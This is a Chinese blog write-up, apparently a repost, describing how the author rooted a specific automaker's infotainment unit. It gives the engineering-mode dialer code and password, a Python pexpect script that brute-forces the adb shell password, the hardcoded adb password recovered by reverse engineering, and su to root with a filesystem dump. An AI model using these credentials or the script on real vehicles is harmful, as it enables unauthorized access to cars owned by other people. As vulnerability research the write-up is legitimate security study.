Hacked某安汽车车机系统

这篇具有很好参考价值的文章主要介绍了Hacked某安汽车车机系统。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

        很久之前尝试对某安汽车的车机系统进行渗透测试,但是却卡在入口无法进入,尝试暴力破解但是字典不够强大,没能成功。前段时间看到了绿盟科技博客的《新型车机,如何攻防?》感觉有点熟悉,再次探索发现可以获得车机系统root权限,遂事后诸葛亮一波,就当是学习笔记了。

        通过在论坛、QQ群、贴吧收集到这款车型进入工程模式的方法,在拨号键盘输入*#*#888,然后点击拨号,如图:

车机root,车机安全

        进入密码认证界面,输入收集到的密码:369875,如图:

车机root,车机安全

        此时进入工程模式,可以看到工程模式的功能,如图:

车机root,车机安全

        点击“USB切换”可以将中控台下边的USB口切换为adb模式,从而通过数据线连接车机系统adb shell。可能我们需要启动USB调试,首先点击“打开系统设置原始界面 ——> Settings”,如图:

车机root,车机安全

        此时进入系统设置界面,可以看到下边有“关于智能平台”,如图:

车机root,车机安全

         点击“关于智能平台”后可以看到Android 版本、硬件型号版本号等等信息,如图:

车机root,车机安全

        连续点击7次版本号后开启开发者模式,然后开启USB调试,如图:

车机root,车机安全

         在连接adb shell时提示需要输入密码,如图:

车机root,车机安全

        当时卡在这里很久,编写Python脚本使用字典爆破了很久也没成功,Python3脚本如下:


import pexpect
import random
import sys
# Open the password dictionary file

if len(sys.argv) < 2:
    print("Usage: python3",sys.argv[0],"password.txt")
    exit(0)
else:
    print("ADB Shell Brute         --By Infiltrator")
    with open(sys.argv[1]) as f:
        passwords = f.readlines()
    adb = pexpect.spawnu("adb shell",timeout=1)
    #adb.logfile_read = sys.stdout
    # Try each password in the dictionary file
    for password in passwords:
        password = password.strip()  # Remove leading/trailing whitespace
        # Wait for the password prompt
        try:
            s = adb.expect("password:")
        except:
            print("[!] Please check adb if connected!")
            exit(1)
        # Enter the password
        print("\r[*] Testing password:",password,end='')
        adb.sendline(password)
        # Wait for the output and check if we successfully logged in
        s = adb.expect(["verify success!", "verify failed!"])
        if s == 0:
            # Login succeeded, we're done
            print("\n[+] Success! Password is:", password)
            break
        else:
            # Login failed, try the next password
            continue

         直到看到新型车机,如何攻防?,文中逆向分析获得的密码立即让我觉得很是熟悉,如图:

车机root,车机安全

        我直接使用该密码就可以成功登录adb shell,同时把密码加入字典后也可以破解出来,说明脚本没问题:

车机root,车机安全

         并且直接执行su命令就获得root权限,如图:

车机root,车机安全

        虽然限制策略不严格但是,adb push和adb install都无法安装app,暂时就先不管这些了,先复现一下硬编码漏洞吧。

        普通权限的adb pull命令基本获取不到什么有用的信息,执行adb root切换为root权限的adb,然后在使用adb pull将车机系统的文件系统下载到本地,如图:

车机root,车机安全

        由于下载的文件太多,等了几分钟也没下载完,然后就直接下载system目录了,如图: 

车机root,车机安全

        在system/bin目录下发现adbd程序,如图:

车机root,车机安全

        使用IDA逆向分析,通过搜索password字符串定位程序输入,然而根本找不到password这个字符串,查看所有字符串可以发现程序调用了/system/bin/verify_sh,如图:

车机root,车机安全

        使用IDA分析verify_sh,同样直接搜索password字符串定位输入,然后跳转到代码上下文发现内存中Base64编码的内容:

车机root,车机安全

        解码之后为8769b3ad,应该是小端序的原因,将原本的adb36987在内存中存储为8769b3ad,如图:

车机root,车机安全

 文章来源地址https://www.toymoban.com/news/detail-727108.html

到了这里,关于Hacked某安汽车车机系统的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 浅谈电动汽车充电站箱变电气安全物联监测系统设计与应用

    摘 要:基于物联网技术架构提出了一种适用于电动汽车充电站箱变的电气安全物联监测系统设计方案。该系统由电气安全智能感知设备、通信网关、电气安全物联网监测平台等构成,可支持充电站箱变充电桩出线回路电流、电缆 温度、剩余电流、故障电弧ª、短路电流等数据

    2024年01月21日
    浏览(28)
  • MySQL8.0版本在CentOS系统安装&&修改MySQL的root密码和允许root远程登录(介绍但对于生产来说不安全,学习可用)

    注意:安装操作 需要root权限 安装 配置yum仓库(秘钥为GnuPG签名,2023为版本的秘钥(对我当前是最新的),后面可能会改变)  # 更新密钥 rpm --import https://repo.mysql.com/RPM-GPG-KEY-mysql- 2023 # 安装Mysql8.x版本 yum库, 其中的el7代表的应该是LInux7版本,可以参考阿里云的# MySQL :: 下载

    2024年04月14日
    浏览(43)
  • 上海控安SmartRocket系列产品推介(六):SmartRocket PeneX汽车网络安全测试系统

    产品概述 上海控安汽车网络安全测试系统PeneX(Penetrator X)是一款支持对整车及车辆零部件及子系统实施网络安全测试的系统,其包含硬件安全、软件系统安全、车内通信及车外通信四大安全测试系统;支持合规性测试,包含国内外的法规及标准;提供实验室部署方案及便携

    2024年02月09日
    浏览(33)
  • 适用于电动汽车充电站箱变的电气安全物联监测系统设计方案——安科瑞赵嘉敏

    摘 要: 基于物联网技术架构提出了一种适用于电动汽车充电站箱变的电气安全物联监测系统设计方案。该系统由 电气安全智能感知设备、通信网关、电气安全物联网监测平台等构成,可支持充电站箱变充电桩出线回路电流、电缆 温度、剩余电流、故障电弧、短路电流等数据

    2024年01月23日
    浏览(30)
  • 榨干Pixel5最后的价值:编译刷写Android12L车机系统

    去年2022年中的时候,突然迷上了小屏手机,当时小屏的选择很有限,所以左挑右选网购了一台Pixel 5的库存机。酷安各个机主都称呼其为小五,小巧机身,这台鼠尾草绿的颜色很好看。 原生安卓系统的人机交互里有很多让人惊喜的细节,比如我开睡眠模式的时候,整个屏幕的

    2024年01月22日
    浏览(48)
  • Android Framework最难模块WMS实战作业-手机车机系统开发必备

    0-整体介绍 1-window-container.mp4 窗口层级树实战启动篇 2-displayarea-feature.mp4 窗口层级树源码分析相关 3-displayarea-draw-feature.mp4 窗口层级树绘制实战1 4-displayarea-draw-leaf.mp4 窗口层级树绘制实战2 5-displayarea-draw-leaf-2.mp4 窗口层级树绘制实战3 6-displayarea-surfacelayer.mp4 窗口层级树相关sur

    2024年02月12日
    浏览(34)
  • android多屏触摸相关的详解方案-安卓framework开发手机车载车机系统开发课程

    直播免费视频课程地址:https://www.bilibili.com/video/BV1hN4y1R7t2/ 在做双屏相关需求开发过程中,经常会有对两个屏幕都要求可以正确触摸的场景。但是目前我们模拟器默认创建的双屏其实是没有办法进行触摸的 静态修改方案 使用命令查看display2即副屏的信息情况 adb shell dumpsys d

    2024年02月11日
    浏览(33)
  • root关闭后安全吗,root不安全状态怎么取消

    建议关闭安全些,分析好与坏如下: 手机成功获取root好处: 1、root后可以删除原厂系统自带没什么用的软件,可以节省存储空间。 2、root后可以管理开机启动项,禁用不需要后台运行的程序,从而达到给手机省电的效果。 3、使用有些软件时需要权限,系统故障刷机时需要权

    2024年02月16日
    浏览(25)
  • 浅析汽车芯片信息安全之安全启动

    作者 | Cassie Ren 复睿微首席架构专家。 一、汽车芯片信息安全发展现状 汽车的安全机制实际上主要包括功能安全(Safety)和信息安全(Security)两个方面。功能安全是涉及人身安全的保护机制,而信息安全则是保护我们的汽车系统里的信息不被恶意窃取和破坏。 早期的汽车芯

    2023年04月15日
    浏览(34)
  • [免费专栏] Android安全之Root检测与Root绕过(浅析)

    也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大 少走了弯路,也就错过了风景,无论如何,感谢经历 转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球 感谢大家一直以来对我CSDN博客的关注和支持,但

    2024年02月08日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包